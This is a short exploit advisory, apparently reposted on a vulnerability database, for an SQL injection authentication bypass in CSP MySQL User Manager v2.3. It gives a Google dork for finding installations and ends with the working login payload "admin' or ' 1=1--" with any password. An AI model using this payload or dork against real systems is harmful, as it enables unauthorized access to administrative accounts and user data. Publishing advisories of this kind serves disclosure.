Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30223
HistoryJan 09, 2014 - 12:00 a.m.

CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass

2014-01-0900:00:00
vulners.com
51

Exploit Title: CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass

Google Dork: intitle:"CSP MySQL User Manager"

Date: 8/1/2013

Exploit Author: Youssef mami

Vendor Homepage: https://code.google.com/p/cspmum/

Software Link: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=

Version: 2.3

Tested on: Linux 2.6.38-11

CVE : nothing

##################################################################################
.__ __
| |__ _____ _____ _____ _____ _____ / |
| | \\
\ / \ / \\
\ / \/ __ \ \
| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ /| |
|
| (
_ /|_| /|| (___ /|| /\ >|
\/ \/ \/ \/ \/ \/ \/
.
_____ __ .__
|| / \ _____ _____ / ||| ________ __ ____
| |/ \ \/ _ \ __ \/ \\
\\ \ |/ / | \/ __ \
| | | \ | ( <
> ) | \/ Y Y \/ __ \| | | < <
| | | /\ /
|
|
| /
| \/|| ||| (_ /| ||\__ |/ \ >
\/ \/ \/ || \/
.

______ ______________ || ____ ____ ______
/ // __ \ __ \ \/ / |/ \/ __ \ / /
\
\\ /| | \/\ /| \ \\ / \ \
/
>\
>
_| \
/ ||\
>___ >____ >
\/ \/ \/ \/ \/

##################################################################################
SQL Injection Authentication Bypass
Product Page: https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&amp;can=2&amp;q=

Author(Pentester): Youssef mami ([email protected])
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password
login : admin' or ' 1=1–
password: hammamet informatique services